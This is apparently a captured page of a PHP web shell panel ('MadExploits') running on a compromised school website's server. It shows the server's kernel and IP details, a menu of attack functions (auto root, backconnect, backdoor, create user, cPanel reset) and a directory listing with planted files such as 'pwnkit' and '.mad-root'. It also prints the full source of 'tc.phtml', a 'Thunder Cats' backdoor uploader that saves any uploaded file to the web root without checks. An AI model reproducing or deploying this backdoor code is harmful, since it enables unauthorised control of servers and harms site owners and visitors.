Linux ip-148-66-134-25.ip.secureserver.net 3.10.0-1160.119.1.el7.tuxcare.els10.x86_64 #1 SMP Fri Oct 11 21:40:41 UTC 2024 x86_64
Apache
: 148.66.134.25 | : 18.117.156.170
66 Domain
8.0.30
amvm
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
home /
amvm /
public_html /
rajia /
[ HOME SHELL ]
Name
Size
Permission
Action
.well-known
[ DIR ]
drwxr-xr-x
cgi-bin
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
files
[ DIR ]
drwxr-xr-x
fonts
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
myadmin
[ DIR ]
drwxr-xr-x
scss
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxr-xr-x
.htaccess
197
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
about.php
13.46
KB
-rw-r--r--
academic.php
10.43
KB
-rw-r--r--
addmission.php
1.76
KB
-rw-r--r--
bootstrap.php
79.58
KB
-rw-r--r--
cbse-corner.php
3.3
KB
-rw-r--r--
config.php
623
B
-rw-r--r--
contact.php
1.81
KB
-rw-r--r--
error_log
282.11
MB
-rw-r--r--
favicon.ico
2.56
KB
-rw-r--r--
footer.php
6.15
KB
-rw-r--r--
gallery.php
1.53
KB
-rw-r--r--
header.php
10.8
KB
-rw-r--r--
index.php
23.2
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
rajia.zip
37.23
MB
-rw-r--r--
tc.php
1.22
KB
-rw-r--r--
tc.phtml
972
B
-rw-r--r--
theschool.php
4.23
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : tc.phtml
<?php ?>Private uploader | ---Thunder Cats---- <?php /** * @author: Thunder Cats * @mail: Thunderc0027@gmail.com * @Screenshot: * @Last Updated: 16 Dec 2014 */ @ini_set('display_errors', 0); function entre2v2($text, $marqueurDebutLien, $marqueurFinLien, $i = 1) { $ar0 = explode($marqueurDebutLien, $text); $ar1 = explode($marqueurFinLien, $ar0[$i]); return trim($ar1[0]); } if(isset($_POST['Submit'])){ $filedir = ""; $maxfile = '2888888'; $file_name = $_FILES['image']['name']; $temporari = $_FILES['image']['tmp_name']; if (isset($_FILES['image']['name'])) { $abod = $filedir.$file_name; @move_uploaded_file($temporari, $abod); echo"<center><b>Link ==> <a href='$file_name' target=_blank>$file_name</a></b></center>"; } } else{ echo' <form method="POST" action="" enctype="multipart/form-data"><input type="file" name="image"><input type="Submit" name="Submit" value="Submit"></form>'; }
Close